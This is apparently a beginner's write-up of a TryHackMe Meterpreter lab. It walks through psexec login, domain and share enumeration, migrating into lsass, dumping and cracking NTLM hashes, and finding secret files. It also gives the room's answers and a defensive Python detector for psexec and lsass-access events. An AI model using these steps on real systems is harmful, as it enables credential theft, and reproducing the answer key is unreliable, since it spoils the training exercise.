Exploitation Basics: Metasploit: Meterpreter (TryHackMe)


This article is a write-up for the Metasploit: Meterpreter room, covering the Introduction to Meterpreter, Meterpreter Flavors, Meterpreter Commands, Post-Exploitation with Meterpreter, and the Post-Exploitation Challenge.

As a beginner I found this room as challenging as the previous one, but here is what I've learned so far:

  • Try to read through all areas.

  • The specific module to use, or the user name and password, will have been provided.

  • If stuck, always check whether the question has a hint to use as a guide.

  • Cybersecurity entails a lot of research, including the use of tools like ChatGPT and Microsoft Copilot to better understand terms or find commands.

  • The cybersecurity field is research-oriented, wide, and resourceful. Others have written write-ups and created YouTube channels and communities, among other things, to help those who might be stuck on something they struggled with too, or as a way of giving back. We should consider doing the same.

  • For this room I tried to do it on my own, but when stuck I followed this YouTube channel, which walks through the room.

To get a Meterpreter session on the AttackBox we've been told to:

  • use exploit/windows/smb/psexec

  • set RHOSTS Target_IP_Address (the MACHINE_IP of the target)

  • show options

  • set SMBUser user_name

  • set SMBPass password

  1. What is the computer name? ACME-TEST

  2. What is the target domain? FLASH

Run the background command; this drops you back to the msf6 prompt where we used the windows/smb/psexec module. As the hint suggests, use the post/windows/gather/enum_domain module: run show options, which lists the SESSION option, then run sessions to see the available sessions, set SESSION 1, and run (or exploit). The output shows the domain name.

  3. What is the name of the share likely created by the user? speedster

Based on the hint, use post/windows/gather/enum_shares, set SESSION 1 again, and run.

  4. What is the NTLM hash of the jchambers user?

Based on the hint, we need to migrate into the process ID of lsass.exe. Use exploit/windows/smb/psexec and exploit again to get back into Meterpreter, run ps to find the lsass.exe process, then migrate 772 (the PID shown by ps) and run hashdump to see the result.
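The two steps above, the psexec service install and the handle on lsass.exe, are also the steps a blue team can see. The following is an added detection example, not part of the TryHackMe room or the original post: it scans constructed event records shaped like a Windows System log entry (Event ID 7045, service installed) and a Sysmon Event ID 10 (process access) entry. The allow list, the 8-letter service-name pattern and the access-mask threshold are my own assumptions for the demo.

```python
"""Added detection example for the psexec and lsass/hashdump steps above; not
part of the TryHackMe room or the original post. Event records are constructed."""
import re

# Rights `migrate` needs on lsass: CREATE_THREAD | VM_OPERATION | VM_READ | VM_WRITE.
INJECT_RIGHTS = 0x0002 | 0x0008 | 0x0010 | 0x0020
RANDOM_SVC = re.compile(r"^[A-Za-z]{8}$")  # assumed psexec footprint: 8 random letters
TRUSTED_DIRS = ("%systemroot%\\system32\\", "c:\\windows\\system32\\", "c:\\program files")
LSASS_ALLOW = ("c:\\windows\\system32\\svchost.exe", "c:\\windows\\system32\\csrss.exe")

# Constructed sample events (names, paths and the service name are made up).
SAMPLE_EVENTS = [
    {"channel": "System", "event_id": 7045, "ServiceName": "PGbQKmEY",
     "ImagePath": "%SYSTEMROOT%\\PGbQKmEY.exe"},
    {"channel": "System", "event_id": 7045, "ServiceName": "Spooler",
     "ImagePath": "%SystemRoot%\\System32\\spoolsv.exe"},
    {"channel": "Sysmon", "event_id": 10, "SourceImage": "C:\\Windows\\PGbQKmEY.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"channel": "Sysmon", "event_id": 10, "SourceImage": "C:\\Windows\\System32\\svchost.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"},
    {"channel": "Sysmon", "event_id": 10, "SourceImage": "C:\\Windows\\System32\\Taskmgr.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"},
]

def flag_service_install(ev):
    """System/7045: random 8-letter service name with a binary outside normal dirs."""
    name, path = ev.get("ServiceName", ""), ev.get("ImagePath", "").strip('"').lower()
    if RANDOM_SVC.match(name) and not path.startswith(TRUSTED_DIRS):
        return f"psexec-style service install: {name} -> {ev['ImagePath']}"
    return None

def flag_lsass_access(ev):
    """Sysmon/10: injection-capable rights on lsass from a non-allowlisted process."""
    if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None  # only handles opened on lsass.exe matter here
    src, mask = ev.get("SourceImage", "").lower(), int(ev.get("GrantedAccess", "0x0"), 16)
    if src not in LSASS_ALLOW and mask & INJECT_RIGHTS:
        return f"injection-capable handle to lsass from {ev['SourceImage']} ({ev['GrantedAccess']})"
    return None  # query-only handles such as 0x1000 are routine and ignored

def scan(events):
    """Return alert strings for a sequence of event records."""
    rules = {("System", 7045): flag_service_install, ("Sysmon", 10): flag_lsass_access}
    hits = (rules.get((ev["channel"], ev["event_id"]), lambda e: None)(ev) for ev in events)
    return [h for h in hits if h]
```

On the sample data only the random-named service and the full-access handle from that service's binary are reported; the Spooler install and the query-only handles are left alone.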

  5. What is the cleartext password of the jchambers user? Trustno1

Look the hash up in a rainbow table service such as CrackStation.

  6. Where is the "secrets.txt" file located? (Full path of the file) c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt

Use the search -f secrets.txt command in Meterpreter.

  7. What is the Twitter password revealed in the "secrets.txt" file? KDSvbsw3849!

  8. Where is the "realsecret.txt" file located? (Full path of the file) c:\inetpub\wwwroot\realsecret.txt

  9. What is the real secret? The Flash is the fastest man alive

Thank you for reading my article. Please leave any questions or comments on improving my learning journey and the THM challenges. We can also connect more on LinkedIn or X.


Support Sharon Jebitok by becoming a sponsor. Any amount is appreciated!